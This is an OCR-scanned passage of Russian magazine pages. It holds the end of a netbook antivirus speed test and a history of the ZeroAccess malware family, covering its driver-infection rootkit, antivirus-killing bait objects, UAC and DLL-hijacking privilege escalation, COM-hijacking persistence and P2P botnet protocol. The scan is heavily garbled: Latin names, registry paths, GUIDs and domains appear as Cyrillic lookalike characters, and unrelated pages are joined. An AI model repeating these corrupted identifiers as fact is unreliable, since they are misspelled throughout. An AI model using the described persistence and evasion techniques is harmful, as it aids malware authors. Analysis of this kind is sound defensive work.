узнать о статистической обработке 
результатов различных измерений 
и погрузиться в мир эффективных, 
несмещенных и состоятельных 
оценок результатов экспериментов 
и опытов, то тебе просто необ- 
ходимо познакомиться с трудом 
Елены Сергеевны Вентцель «Теория 
вероятностей и ее инженерные при- 
ложения». Поверь мне, это не фигня! 



Время проверки коллекции файлов 

В этом тесте мы проверим, как долго каж- 
дый из антивирусов делает то, для чего 
он и предназначен. Для проверки была 
создана папка, содержащая 24 605 раз- 
личных файлов общим объемом 1 ,39 Гб. 

В этом тесте два явных лидера — 
N0032 и «Касперский», а больше всех 
шуршал головками жесткого диска, 
пытаясь отыскать какую-нибудь мал- 
варь, Ог.ѴѴеЬ. При этом стоит отметить, 
что оба лидера имеют в своем арсенале 
технологии, значительно ускоряющие 
повторное сканирование, и для чистоты 
эксперимента они были отключены. 



Н Скорость архивирования 
и разархивирования 

Ну и в заключение подвергнем нетбук 
с каждым антивирусом по очереди по- 
следнему испытанию: заархивировать 
219 файлов общим объемом 1 , 16 Гб 
с одновременной полной проверкой ком- 
пьютера на наличие вирусов. Для архиви- 
рования будем использовать архиватор 
7-2ір, тип создаваемого архива — 2 ір. 

В этот раз победу одержал Ог.ѴѴеЬ, 
далее с небольшой задержкой финиши- 
ровал М8Е, N0032 на третьем месте, 
ну а последним пришел «Касперский», 
отстав от лидера более чем на минуту. 



в 




Результаты теста № 6 




Результаты теста № 7 



оѵо 



На диске ты найдешь 
результаты всех эксперимен- 
тов, а также утилиты ВооЖасег 
и АррТітег, с помощью 
которых проводилось 
исследование. ^ 
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Измерение времени загрузки 
программы с помощью АррТітег 
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Планируя это испытание для антивирусов, мы 
постарались свести к минимуму субъективизм 
в оценках, используя всем понятные единицы 
и одинаковые инструменты и методики измере- 
ний для всех испытуемых. 

Конечно, если у тебя на столе стоит много- 
ядерный монстр с парой десятков мегабайт 
оперативки, перемалывающий бесконечный 
поток цифр со скоростью света, то при выборе 
антивируса ты вряд ли будешь руководствовать- 
ся результатами проведенных нами сегодня ис- 
пытаний. 

Если же ты озадачен выбором антивирус- 
ного средства для нетбука, неттопа или другой 
маломощной системы, то, я думаю, статья даст 
тебе определенную пищу для размышлений 
и поможет принять взвешенное и обдуманное 
решение. Ш 










^Езіопіа, 



^Мозсоѵѵ 



Іе^доѵ^па 



ДОЖИЛИ! УЖЕ И БИОГРАФИИ 
ВИРУСОВ ПУБЛИКУЮТ! 

Со временем некоторые вредоносные программы 
становятся своеобразными брендами в среде кибер- 
андеграунда. Как правило, они широко распростра- 
нены по сравнению с другими вредоносами и исполь- 
зуют различные технологичные фишки. К их числу 
можно отнести семейства Заіііу, СопТіскег, ѴѴаІебас, 
2еиз, Т^^ и множество других. Как бы ни боролись 
с такими угрозами антивирусные компании, «иногда 
они возвращаются». В логичности использования 
раскрученного имени злоумышленникам не отка- 
жешь. Разбирая функционал очередной «зверушки», 
невольно задаешь себе вопрос — а когда это все 
началось? И выясняется, что и не год, и не два назад. 
Об одном таком семействе и будет рассказано далее. 



НАЧАЛО 

История ІегоАссезз (ака МАХ++) началась в июне 2009 года. 
Именно тогда был обнаружен образец вредоносной програм- 
мы, который использовал путь вида \\?\дІоЬаІгооІ\Оеѵісе\_ 
тах++>\[8 бідіі Рех сос1е].с111, а в драйвере ядра имел строку «Г\ 
ѴС5\геІеа5е\2егоАссез8.рсІЬ». Так что название 2егоАссезз — 
авторское. Как известно, некоторые антивирусные вендоры 
не хотят называть вредоносы так, как задумывали их авторы, по- 
этому МАХ++ также известен под названиями Зтізсег и Зіге^еТ 
Версия 2009 года прятала свой бинарный код в альтернативных 
потоках (АІІегпаіе ОаХа З^геатз — АОЗ) файловой системы МТРЗ 
под названиями ѵуіп32к.зуз:1 и ѵѵіп32к.зуз:2, которые пропи- 
сывались в системе как сервисы. Первый из этих файлов был 
приманкой — если антивирусное ПО пыталось получить доступ 
к нему, 2егоАссезз немедленно завершал сканирующий про- 
цесс. Впоследствии использование техники слежения за спе- 
циально созданными объектами ОС для «убийства» антивиру- 
сов стало его отличительной особенностью. 

СВОДНЫЙ БРАТТОІЗ 

В январе 2010-го создатели 2егоАссезз принялись распростра- 
нять новую версию своего детища. Для этого задействовались 
ресурсы сети Есаіеі компании РВМ. Отличительным призна- 
ком новой версии 2егоАссезз было явное заимствование идей 
ТОІЗ, а именно — запуск через заражение драйвера и исполь- 
зование скрытого хранилища для своих компонентов. 

Установка в систему начиналась с файла-дроппера, на- 
пример с именем кеудеп.ехе. Для нормальной работы не- 




Маіѵѵаге 
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Драйвер -руткит 




обходимы были права администратора, что при маскировке 
под кейген для любимой игрушки не было особой пробле- 
мой. При установке на диск никаких временных рабочих 
файлов не извлекалось, все манипуляции происходили в па- 
мяти. Для старта при загрузке ОС использовалась методи- 
ка загрузки при помощи функции 2ѵѵЬоасЮгіѵег(). Перво-на- 
перво выбирался существующий в системе драйвер-жертва, 
подпадающий под несколько необходимых признаков: имя 
драйвера должно было находиться в диапазоне от Мсііз. 
зуз до ѴѴіп32к.зуз, размер — более 0х4С10 байт, 1МАСЕ_ 
ОРТЮМА1_НЕАОЕР->ЕхроП ТаЫе.ПѴА выставлен в МУН 
(драйвер ничего не экспортирует). Также драйвер не дол- 
жен был запускаться при загрузке системы, это проверялось 
по флагу Зіагі (0 — не загружать) в ветке реестра зегѵісез. Вы- 
брав подходящий драйвер, ІегоАссезз целиком переписы- 
вал его своим кодом, предварительно отключив 5РС. Далее 
создавалась запись в реестре о новом сервисе со случайным 
именем и параметрами Туре = 0x1, Зіагі = 0x3. Хитрость за- 
ключалась в том, что ІтадеРаШ для сервиса выставлялся в \*, 
а для \* при помощи функции 2ѵѵСгеа1еЗутЬоІісипкОЬіес1() 
создавался симлинк на перезаписанный драйвер. Указанный 
сервис и стартовал путем вызова 2ѵѵЕоасЮгіѵег(). Запущен- 
ный руткит регистрировался через вызов ІоСгеа1еОгіѵег{) 
в качестве драйвера ОС, для перехвата операции ввода-вы- 
вода на уровне ІРР-пакетов драйверов мини-порта дисковой 
подсистемы. Далее создавалось виртуальное устройство 
с фиксированным именем \??\С2СА0972#4079#41с13#А680# 
АО34СС121074, к которому подмонтировался ранее создан- 
ный файл хранилища под именем %зуз1ет%\Соп^ід\[гапсІот 
зутЬоІз].заѵ. Теперь дроппер мог обращаться к своему хра- 
нилищу через виртуальное устройство. После форматиро- 
вания хранилища в сжатый том МТРЗ при помощи функций 
библиотеки ТтіТз.сІІІ туда сохранялись все остальные компо- 
ненты, включая копию чистого драйвера. Структура файлов 
приведена на рис. 1 . 

Функция руткита заключалась в сокрытии содержимого 
перезаписанного драйвера; при попытке его прочитать руткит 
демонстрировал сохраненный исходный файл. Помимо это- 
го, руткит инициировал запуск инжектора В480А0Р8.зуз, ко- 
торый внедрял основной модуль ОН с именем мах++.00.х86 
в адресное пространство браузера посредством АРС. Можно 
заметить, что в ходе работы функции непосредственного за- 
пуска вообще не используются, дабы не вызывать срабаты- 



Рис. 1 . Структура фай- 
ловой системы 



вания проактивной защиты антивирусов. Основной модуль 
имел функции связи с командным центром и подмены по- 
исковой выдачи для перенаправления пользователя на вре- 
доносные сайты, предлагающие загрузить фейковый анти- 
вирус (РакеАѴ). Параметры подключения брались из файлов 
в хранилище с названиями, похожими на СЕ5Ю, например 
{49В474ЕВ-92О0-464Т-В1ОО-1Р37ААВР9О95}. По информа- 
ции Зутапіес, между 1 июля 2009-го и 30 июня 2010 года 
было произведено около 43 миллионов установок поддельных 
антивирусов. Если учесть стоимость такого «подарка» — от 30 
до 100 долларов, вырисовывается, что этот бизнес был доста- 
точно прибыльным. 

В 2011 году появилась обновленная версия. Для загруз- 
ки руткита использовался все тот же метод запуска через 
2ѵѵІоасЮгіѵег() с небольшими изменениями. Теперь драй- 
веры выбирались из диапазона от сіаззрпр.зуэ до ѵ\/іп32к. 
зуз, размером больше, чем 0x7410. В коде дроппера при- 
сутствовала проверка на выполнение в 64-разрядной сре- 
де, в этом случае выполнение сразу завершалось. Имя 
устройства для обращения к хранилищу имело вид \\?\ 
АСРІ#РМР0303#2&сіа1аЗТТ&0 (могло меняться от релиза 
к релизу). Файл хранилища размером 16 Мб %зузіет%\ 
СопЛд\[гапс1от зутЬоІз] на этот раз не был сжат, а шифро- 
вался 128-битным статическим ключом РС4, расшифровка 
производилась на лету драйвером руткита при обращении 
к файлам, содержавшимся в хранилище. Появилась ярко вы- 
раженная модульная структура (см. рис. 2), модули загружа- 
лись с удаленного сервера. Для связи с командным центром 
устанавливалось соединение на порт 13620. Сами запросы 
и ответы передавались в зашифрованном виде. 

РАБОТА В Х64 И ТРЮКИ САМОЗАЩИТЫ 

Вплоть до апреля 2011 года 64-разрядные версии ОС не за- 
ражались 2егоАссезз. В мае это досадное упущение было ис- 
правлено, но не сказать чтобы очень технологично. Дело в том. 



Фунщия руткита заключалась в сокрытии 
содержимого перезаписанного драйвера; 
при попытке его прочитать руткит демон- 
стрировал сохраненный исходный файл 



СВЯЗЬ МЕЖДУ 2ЕК0АССЕ88 И ТОІЗ 









В январе 2010 года в семействе ТОІЗ появилась версия, 
в которой файл полезной нагрузки назывался не стсІ.сІІІ, 
а ІООсІіскег.сІІІ. Казалось бы, при чем тут ІегоАссезз? Все 
дело в том, что строка 200сІіскег в дальнейшем несколько 
раз упоминалась в связи с этим семейством вредоносов. 

А ’ Сначала, в августе 2001 -го, было выявлено распростра- 

Й нение модуля сіезкіор.іпі для 2егоАссезз. Этот модуль 

блокировал работу ТОЕЗ (последней версии, с именами, 
как у Т0Е4) путем удаления конфигурационного файла 
сід.іпі и модуля стсІ.сІІІ из хранилища ТОЕ (если бы целью 
был Т0Е4, то еще должен был бы удаляться стс164.с111). Кроме функции «КіІІ ТОЕ», 
интерес представляет распространение модуля 200сІіскег2.сІІІ, предназначенного 
для накрутки посещения сайтов. Последняя версия ІегоАссезз содержит в своем 
составе модуль, отвечающий за сііск ^гаисі, который создает класс с именем 
гООсИскегЗ. Вот и думай после этого, есть между ІегоАссезз и ТОЕЗ связь или нет. 

Некоторые специалисты, например представитель компании ѴѴеЬгооІ Жак 
Эразмус (Засдиез Егазтиз), говорят, что исходные коды ТОЕЗ были проданы 
разработчикам ІегоАссезз. Произошло это примерно в конце 2009 — начале 
2010 года. Так что не исключено, что версия ТОЕЗ с 200сІіскег.сІІІ и 2егоАссезз — 
результаты сторонней разработки на базе исходного кода ТОЕЗ. В то же время 
сотрудники «Лаборатории Касперского» заявляют, что никакой связи между ТОЕЗ 
и 2егоАссезз нет. По их словам, скорее, речь может идти о геѵегзе епдіпеегіпд 
и заимствовании идей ТОЕЗ. 
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что для х86 алгоритм работы был аналогичен предыдущей 
версии и руткит работал на уровне ядра. В противовес этому, 
в среде х64 все работало в изеггпосіе. 

Как известно, в ѴѴіпсІоѵѵз, начиная с Ѵізіа, появился ІІАС — 
компонент системы, который запрашивает подтверждение 
действий, требующих прав администратора. ІІАС, конечно, не- 
сколько повысил уровень безопасности ѴѴіпсІоѵѵз, но, как всег- 
да, злобные хакеры все испортили. В ІІАС многие системные 
программы жестко прописаны как доверенные (например, 
ехріогег.ехе), поэтому код, который приводит к срабатыванию 
для других приложений, для них не работает при настройке 
по умолчанию. Эта особенность была использована в дроппере 
2егоАссезз для того, чтобы поднять свои привилегии в системе 
до уровня администратора, окно УАС при этом пользователю 
не показывалось (со временем этот баг был исправлен). 

Для обхода средств мониторинга трафика в заголовке НТТР- 
запроса Н08Т использовалось сгенерированное при помощи 
Оотаіп Оепегаіог АІдогіШгп (ОЭА) доменное имя в зоне .сп, 
реально оно не резолвится серверами ОМЗ. В ответ на запрос 
с неправильным заголовком Н05Т сервер возвращал пустой 
ответ. То есть сервер точно так же генерировал значение и срав- 
нивал его с поступившим от бота. Эти действия представляли 
собой некую систему псевдоаутентификации, которая защища- 
ла сервер, например от сканирования поисковыми роботами. 

Так как процедура установки для х86 уже была описана 
(заражение драйвера), заострять внимание на ней не бу- 
дем. Стоит лишь отметить очередную смену формата хра- 
нилища в июле, теперь это был не файл, а каталог вида С:\ 
ѴѴІМ00ѴѴ5\$МШпіпз!аІІКВххххх$, где ххххх — пять сгенериро- 
ванных цифр. Такое наименование было выбрано с целью ма- 
скировки под рабочую директорию обновления ОС ѴѴіпсІоѵѵз. 
Доступ к ней блокировался путем создания символической 
ссылки с $МШпіпзІаІІКВххххх$ на %зуз1етгоо1%\зуз1ет32\ 
сопТід, а также выставлением правил АСТ. Каждый файл внутри 
директории шифровался ВС4, ключ не был определен в коде, 
а генерировался с использованием некоторых параметров ОС. 
Краткое описание загружаемых из интернета компонентов: 

• @00000001 — резервная копия дроппера; 

• @80000000 — модуль трекинга, предназначен для сбора 
статистики заражений, информация о зараженной системе 
отправлялась на соипіег.уасіго.ги; 

• @800000с0 — поддельная библиотека тзѵѵзоск.сііі для пе- 
рехвата функций ѴѴіпЗоскз, их мониторинг позволял красть 
пароли и логины РТР, а также производить внедрение 
ОаѵаЗсгірІ в НТМ 1-страницы; 

• @000000с0 — модуль внедряет ЗаѵаЗсгірІ для изменения 
выдачи поисковых запросов и отправляет данные РТР- 
аккаунтов на удаленный сервер; 

• @800000сЬ — модуль внедряется в зѵсИозІ.ехе и использу- 
ется для накрутки посещаемости (сііск ІгаисІ); 

• @800000с1 — модуль связи с командным центром, вне- 
дряется в ѵѵіпіодоп.ехе, а затем в браузер, установленный 
на компьютере. В адресном пространстве браузера выпол- 
няется код, связывающийся по фиксированным ІР-адресам 
и порту 13620 с командным центром. Список ІР находится 
в файле с именем, похожим на СІЗЮ. 

В режиме х64 никаких инноваций не наблюдалось. 



Рис. 2. Содержи- 
мое хранилища 
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Рис. 3. Файлы в САВ- 
архиве дроппера Р2Р 
ТСР-ЬавесІ 



Загрузочный модуль сохранялся как %ѵѵіпс1іг%\8у8Іет32\ 
СОП8ГѴ.СІІІ, для его запуска правилась ветка реестра НКЕѴ_ 
ШСАІ_МАСНІМЕ\ЗУЗТЕМ\Сиггеп 1 Соп 1 гоІ 8 е 1 \Соп 1 гоІ\Зе 88 іоп 
Мападег\ЗиЬ 8 у 8 Іепп 8 , в значение ключа «ѴѴіпсІоѵѵз» вставлялась 
строка «соп 8 гѵ:Соп 8 егѵегОІІІпШаІІ 2 а 1 іоп». Для маскировки своих 
файлов 2егоАссезз использовал в качестве хранилища систем- 
ную директорию (ЗІоЬаІ АззетЫу СасНе (ЭАС) вида $ѵѵіпсІіг\ 
аззегпЫу, которая нужна для отображения установленных 
компонентов .МЕТ и не показывает непосредственно свое со- 
держимое в Ехріогег (однако такой способ маскировки не про- 
катывает в РАР и ТоІаІСоттапсІег). Для хранилища создавался 
каталог $ѵѵіпсІіг\а88етЫу\1тр, где и размещались в зашифро- 
ванном виде модули. 

Интересная фишка данной версии 2егоАссез8 — использо- 
вание техники «ловли на живца» для обламывания антивирусов. 
Кроме своего основного драйвера-руткита, ІегоАссезз имел 
дополнительный драйвер ядра для создания «приманки» — 
объекта, на который «клевали» антивирусные средства защиты. 
Этот драйвер создавал устройство \Оеѵісе\8ѵсЬо8І.ехе и со- 
хранял подставной РЕ-файл как \0еѵісе\8ѵсІіо8І.ехе\8ѵс}іО8!. 
ехе, доступ к которому мониторился руткитом. Если какое-либо 
приложение пыталось обратиться к нему, то 2егоАссез8 немед- 
ленно завершал его. Для завершения потока приложения в него 
методом АРС инжектировалось около двухсот байт кода, кото- 
рый вызывал ЕхіІРгосез8(). Но это было еще не все! Чтобы пре- 
дотвратить последующие запуски завершенного приложения, 
для его исполняемого файла 2егоАссе83 сбрасывал правила 
доступа АСЕ, разрешающие чтение и выполнение файла. Таким 
образом, один раз попавшись на крючок, антивирус больше 
не мог запуститься. 

ДАЕШЬ Р2Р! 

Стремясь повысить живучесть зловреда, разработчики ста- 
ли использовать различные ухищрения. Основной упор был 
на возможность работы ЕегоАссезз при любых правах доступа, 
а также на противодействие блокированию командных цен- 
тров. При запуске в ѴѴіпсІоѵѵз Ѵізіа/Зеѵеп происходила попытка 
повысить свои права. Так как баг с обходом ІІАС через инжект 
в ехріогег.ехе был пофиксен, для поднятия прав стал исполь- 
зоваться ОЕЕ Ііі]аскіпд. Его суть в том, что ОС сначала ищет не- 
обходимую ОЕЕ в текущей директории, а потом в системной, 
поэтому, разместив в директории легитимной программы 
□ЕЕ с именем, совпадающим с именем одной из импортиру- 
емых библиотек, можно добиться запуска вредоносного кода. 
Для реализации этого метода на борту дроппера, во внедрен- 
ном САВ-файле (см. рис. 3) присутствовал файл Тр.ехе. Это был 
легальный онлайн-инсталлятор АбоЬе РІазП РІауег, снабженный 
к тому же цифровой подписью ѴегіЗідп. Инсталлятор сохранял- 
ся под именем РІазИРІауегІпзІаІІег.ехе в каталог Іетр, в этот же 
каталог предварительно помещался файл т8ітд32.сІІІ, имя ко- 
торого совпадает с одной из импортируемых ОЕЕ. 

Руткит х86-режима, как и прежде, расставлял в систе- 
ме ловушки. Теперь это был сервис, запускавший файл 
\зу8Іетгоо1\3439254774: 153289011 .ехе, при этом файл 
3439254774 был нулевого размера, а 153289011 .ехе хранился 
в АОЗ и брался из ѵѵзс32. 

В 64-разрядном режиме ѴѴіпсІоѵѵз Ѵізіа/Зеѵеп, если были 
права администратора, использовалась схема с сопзгѵ.сІІІ 
и $ѵѵіпсІіг\аз8етЫу. Если же таких прав не было, это не оказы- 
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валось фатальным, в том числе в среде ХР. Ведь самое главное 
нововведение — файл X, реализующий Р2Р (см. врезку) на базе 
протокола ТСР для распространения своих модулей, а также 
Ьооізігар ІІ5І с названием @, каталоги I) и I, размещались в ме- 
стах, доступных на запись с пользовательскими правами: 

• ХР — %ІІ8егРгоЯІе%\АррІісаІіоп ОаІа\[8 бідіі Иех сосіе] ; 

• Ѵізіа/Зеѵеп — %ІІ5егРгоІіІе%\Арр0аіа\ІосаІ\[8 сіідіі Иех сосіе] . 

Запуск Х-файла прописывался в параметре ЗИеІІ ветки НКЕУ_ 
СиВРЕМТ_иЗЕР\ЗоЙѵѵаге\Місго80Й\Ѵ\/іпсІоѵѵ5МТ\Сиггеп1Ѵег5іоп\ 
ѴѴіпІодоп. Таким образом, функционирование 2егоАссе88 под- 
держивалось из-под учетной записи с ограниченными права- 
ми, пусть даже и без руткит-функций. 

По данным компании Зорііоз, активное распространение 
Р2Р ТСР-ЬазесІ версии началось в сентябре — ноябре 2011-го, 
тогда как первые сэмплы появились в конце июля. Антивирус- 
ные аналитики отмечают, что данная версия загружала два ос- 
новных вида полезной нагрузки — сііск ІгаисІ и зратЬоІ, кото- 
рые легко определить по используемым портам (21810, 22292 
и 34354, 34355 соответственно). 

ВооІ8Ігар ІІ8І содержал 256 значений ІР-адресов, для каж- 
дого из которых указывалась Іітезіатр (РОЗІХ) последнего об- 
ращения. Все пакеты Р2Р-сети шифровались по алгоритму РС4 
статическим ключом. 

Поддерживались следующие типы команд: 

• деІЕ — запрос на получение Ьооізігар ІІ8І; 

• геІЕ — ответ с содержимым ЬооІзДар ІІ8І; 

• деІР — запрос на получение файла: 

• 8е1Р — ответ с содержимым файла; 

• 8ГѴ? — запрос на получение списка файлов. 

Кстати, тип команды — это не строка, а четырехбайтовое 
слово, их так легче сравнивать. Название файла модуля из вось- 
ми НЕХ-символов тоже кодировалось четырьмя байтами. 

Для каждой ноды в текущем Ьооізігар Іізі посылалась 
команда деІЕ. Удаленный компьютер должен был ответить 
командой ге^Е и переслать свой Ьооізігар ІІ8І. Результирую- 
щий список, созданный на основе текущего и присланного, 
содержал ноды со временем обращения, наиболее близким 
к текущему. В ответ на запрос 8гѵ? отправлялся список фай- 
лов, каждая запись в списке содержала два поля: имя файла 
из четырех байт и Іітезіатр создания файла. При обнару- 
жении «свежих» файлов происходило их обновление коман- 
дами деІР, зеІР. Каждый загружаемый модуль должен был 
содержать в себе ресурс «33333», содержащий цифровую 
подпись П5А с ключом 512 бит. Подпись проверялась перед 
запуском файла. 

В протоколе Р2Р имелись некоторые недостатки реа- 
лизации. Сформировав ЬооІ8Ігар ІІ8І из 256 ІР с значением 
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Рис. 4. ФайлывСАВ- Іігпезіагпр заведомо больщим, чем текущее время, можно было 

архиве дроппера «отравить» ЬооІ8Ігар ІІ8І всех НОД, что привело бы к невозмож- 

ргрцоР-Ьазесі ности распространять модули по сети Р2Р. Если в хранилище 

поместить произвольный файл (замечание — значение поля 
тіІІі8есопсІ8 в структуре 1іте_ЯеІсІ файла должно было быть 
при этом равным нулю), он выкачивался удаленными пирами, 
хоть его запуск и был невозможен из-за проверки подписи. Это 
создавало нагрузку на сеть и тем самым могло привлечь вни- 
мание к аномальному сетевому трафику на компьютере, а за- 
тем и обнаружить и удалить ІегоАссезз. Эти недостатки были 
исправлены в следующей реализации Р2Р. 

ПОМАШИ РУТКИТУ РУЧКОЙ 

В мае 2012-го кончилось время, когда в составе 2егоАссез8 
был драйвер ядерного уровня. Теперь вся работа происходила 
в изегпгюсіе. Заглянув в содержимое САВ-файла, можно обнару- 
жить, что из него исчезли компоненты іТк32 и г1к64, зато доба- 
вились \л/32, \л/64, е32, е64 (см. рис. 4). Руткит-компонентов нет, 
соответственно, драйвер ѴѴіпсІоѵѵз в этой версии не перезапи- 
сывается, для запуска при загрузке системы может применять- 
ся один из двух методов — техника СОМ Ні]аскіпд, которая ис- 
пользует системный реестр, и модификация файла зегѵісез.ехе. 

При помощи СОМ Ы]аскіпд запускается на выполнение 
файл с именем п (п32 или п64), который отвечает за работу сети 
Р2Р. Дроппером создаются два идентичных файла п в следую- 
щих двух местах: 



Интересная фишка данной версии 
2.егоАссе$в — использование техники «ловли 
на живца» для обламывания антивирусов 



ТЕХНОЛОГИЯ Р2Р НА СЛУЖБЕ У МАЕѴѴАРЕ 



Использование Р2Р позволяет полностью от- 
казаться от концепции управляющего центра 
для ботнета, управление или распространение 
новых версий бота может производиться с лю- 
бого зараженного компьютера. Р2Р (реег-іо- 
реег, одноранговая сеть) состоит из больщого 
количества компьютеров, каждый из которых со- 
держит информацию о других таких же компью- 
терах, в частности ІР-адрес. Список некоторого 
количества таких компьютеров (пиров, реег, нод, 
побе) называется Ьооізігар Іізі (список первона- 
чальной инициализации). В зависимости оттого, 
откуда берется этот список, различают частично 
децентрализованные и полностью децентрали- 
зованные Р2Р-сети. 

Частично децентрализованные Р2Р-сети 
предполагают загрузку Ьооізігар ІІ8І с заранее 
известных серверов, так работает иТогггепЕ 



В такой системе существует слабое место — 
достаточно заблокировать доступ к серверам, 
содержащим Ьоо^зігар ІізЕ Поэтому та1\л/аге 
зачастую использует полностью децентрализо- 
ванную схему. Полностью децентрализованная 
Р2Р-сеть применительно к таіѵѵаге подразуме- 
вает, что распространение будет проходить в два 
этапа. На первом этапе распространяется бот 
с пустым ЬооІ8Ігар Іі8І или вообще без функций 
Р2Р, он периодически обращается к командно- 
му центру, который фиксирует ІР-адрес бота. 
Кроме непосредственно ІР-адреса, операторов 
ботнета интересует информация, не находит- 
ся ли бот за щлюзом (да1е\л/ау) или сетевым 
экраном (ЯгеѵѵаІІ). Если это не так, значит, бот 
может выступать в роли суперпира (зирег реег, 
зирег побе), то есть к нему могут подключаться 
другие пиры. Как только набрано необходимое 



количество суперпиров, их список заносится 
в ЬооІ8ігар ІІ8І, и новая версия бота с ним на- 
чинает распространяться злоумышленниками. 
После распространения все боты обмениваются 
информацией о своих соседях и формируют 
свой собственный Ьооізігар Іі8І. В результате 
этого возникает Р2Р-сеть. Она устойчива к про- 
паданию определенного количества ботов, так 
как список соседей постоянно меняется. В ходе 
обмена боты также обмениваются информа- 
цией о своей версии. Если бот обнаруживает, 
что он или его модули «устарели», происходит 
закачка новой версии с одного из соседей. 

При закачке, как правило, проверяется цифровая 
подпись файла, чтобы исключить возможность 
распространения «посторонних» файлов. Таким 
образом, все боты в Р2Р поддерживают себя 
в актуальном состоянии. 
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• %ѴѴіпсІіг%\іп5ІаІІег\[иЮ]; 

• %ІІ8егРгоІіІе%\ІосаІ зе«іпд8\аррІісаІіоп сІа1а\[иЮ] (для ХР 
и ниже) или %и8егРгоЯІе%\Арр0аІа\ІосаІ\[ІІЮ] (для Ѵізіа 
и выше). 

Здесь ию — значение, генерируемое дроппером на основе 
хеша М05 от времени создания системного диска и отформа- 
тированное, чтобы выглядеть, как С15Ю, например {е051с979- 
ЬсІсІсІ-5сІ1Т-8953-4Ь8с940е9Ь4сІ}. В указанных каталогах также 
создаются подкаталоги I) (для дополнительных модулей) и I 
(для временных файлов), а также файл @ (832 или 864). 

Один файл п использует Иі]аскіпд СОМ-объекта, ассоци- 
ированного с ѴѴМІ, при этом модифицируется следующий 
ключ реестра: НКСВ\С15Ю\{Р3130СОВ-АА52-4СЗА-АВ32- 

85РРС23АР9С1}\Іпргос5егѵег32. Другой файл п использует 
для запуска СОМ-объект в ветке: НКСи\ЗоЙѵѵаге\СІа88е8\сІ8іс1\ 
{42аес1с87-2188-41М-Ь9аЗ-0с966ГеаЬес1}. 

Модификация файла зегѵісез.ехе производилась интерес- 
ным образом: в файл вставлялся небольшой шелл-код (ѵ\/32 
или ѵѵ64), который вызовом функции 2ѵѵОиегуЕаРіІе() подгружал 
«хвост» вредоносного кода (е32 или е64) из Е)ЛепсіесІ АПгіЬиІез 
файла, предварительно сохраненного туда при помощи 
2ѵѵ5егЕаРіІе(). Функционал РЕ-файлов в компонентах е32 и е64 
был идентичен п32 и п64. 

Более поздние версии прячут свои файлы внутри 
С:\$ВесусІе.Віп или С:\РЕСУСЕЕР (см. рис. 5), где создается 
каталог с именем, соответствующим СЕ8Ю пользователя ком- 
пьютера. Если были права администратора, создавался еще 
каталог с СЕ5Ю 8-1-5-18 (ЕОСАЕ 8Ѵ8ТЕМ). Внутри создавался 
подкаталог со случайным именем, образованным хеширова- 
нием М05 текущего времени. Для старта каждой из двух копий 
файла п создавались следующие СОМ -объекты: 

• НКСи\8оЙѵѵаге\СІа88е8\сІзісІ\{ТЬеЬ8а05-Ьеее-4442- 
804е-409с16с4515е9} — для пользователя с ограниченны- 
ми правами; 

• НКСР\СЕ8Ю\{5839РСА9-7740-42А1 -АСОА-О6А79037Р57Р} — 
для пользователя с правами администратора. 

Алгоритм работы Р2Р-сети претерпел некоторые измене- 
ния. В зависимости от разрядности ОС использовались раз- 
ные порты: 16464 и 16470 для х32, 16465 и 16471 для х64. Таким 
образом, организовывалось четыре независимых Р2Р-сети, 
в каждой из которой использовался свой Р8А-ключ, длина ко- 
торого была увеличена с 512 до 1024 бит. Как и прежде, суще- 
ствовало разделение по типу полезной нагрузки, порты 16464 
и 16465 использовались релизом с сііск ^гаиб рауіоасі, 16470 
и 16471 — релизом с Ьіісоіп тіпег рауіоасі. 

Если раньше Р2Р использовал только ТСР, то теперь спи- 
сок ІР-адресов запрашивался по ІЮР, а список файлов (моду- 
лей) — по ТСР. Команда геІЕ теперь возвращала только 16 зна- 
чений из своего ЬооІ8Ігар ІІ8І (противодействие «отравлению» 
ЬооІ8Ігар ІІ8І), в этом же блоке данных передавались сведения 
об имеющихся модулях. В Ьооізігар ІІ8І теперь указывалось 
не абсолютное значение Ііглезіатр, а разница между теку- 
щим временем и временем последнего обращения. Сведения 
об используемых модулях передавались в виде заголовка, 
состоящего из полей Рііе пате, Тітезіатр, 8іге. К заголовку 
прилагалась цифровая подпись (хеш М05, зашифрованный 
закрытым ключом злоумышленников). Подпись проверя- 
лась на корректность при загрузке и сохранялась в Ехіепсіесі 
АйгіЬиІез файла. Таким образом, криптографическая защита 
от постороннего вмешательства имелась как на уровне со- 
держимого (как и в предыдущей версии, ресурс «33333», со- 
держащий цифровую подпись), так и на уровне имени, даты 
создания и размера файла. Сам файл при передаче шифро- 
вался НС4- ключом. Для принудительной смены Ьооізігар ІІ8І 
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Рис. 5. Располо- 
жение файлов по- 
следней версии 



Пример ХегоАссе$5 хорошо иллюстрирует 
принцип бритвы Оккама — не умножай- 
те сущности без надобности, или, по- 
простому, — не усложняйте 
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была введена команда Меѵѵі, которая могла использоваться 
при обнаружении злоумышленниками зіпкИоІе антивирусной 
компании в списке пиров, для восстановления 8ІаІи8 дио. Все 
указанные отличия от реализации Р2Р предыдущей версии 
были призваны устранить потенциальную возможность нару- 
щить работу ботнета. 

Состав загружаемых модулей различается для разных вер- 
сий. Например, версия сііск ^гаиб с портом Р2Р 16464 обычно 
выкачивает три файла: 

• 800000сЬ.@ — модуль сііск ^гаисі, регистрирует класс с име- 
нем іООсІіскегЗ; 

• 00000001 .@ — сІІІ, используемая в качестве хранилища ре- 
сурсов (данные для 800000сЬ.@); 

• 80000000. @ — модуль трекинга, предназначен для сбора 
статистики заражений, информация о зараженной системе 
отправляется на ІіѵесоипІег.со/соипІ.рИр. 

Версия с Ьіісоіп тіпег использовала несколько иной набор 
модулей: 

• 000000сь.@ — модуль сііск ^гаисі; 

• 80000000. @ — модуль трекинга; 

• 80000032. @, 80000064.@ — модуль Ьіісоіп тіпег (х32 и х64); 

• 00000004. @, 00000008.® — сІІІ, используемая в качестве хра- 
нилища ресурсов (данные для 80000032.® и 80000064.®). 

Кроме указанных, отмечена загрузка модулей перенаправ- 
ления поисковых запросов, рассылки спама и загрузки произ- 
вольных файлов. 

ЗАКЛЮЧЕНИЕ 

Пример 2егоАссе88 хорошо иллюстрирует принцип бритвы 
Оккама — не умножайте сущности без надобности, или, по- 
простому, — не усложняйте. Начавщись как технологичная 
разработка и потеряв в ходе своей эволюции руткит-состав- 
ляющую, 2егоАссе88 тем не менее успешно продолжает суще- 
ствовать и даже обзавелся такой модной фичей, как Р2Р. 

По оценкам компании 8орИо8, количество заражений ком- 
пьютеров ботом 2егоАссе88 на конец августа 2012-го состав- 
ляло более 9 миллионов, а активных ботов — около 1 милли- 
она. В отчете лаборатории КіпсІзідИІ 8есигі1у «Маіѵѵаге РероП» 
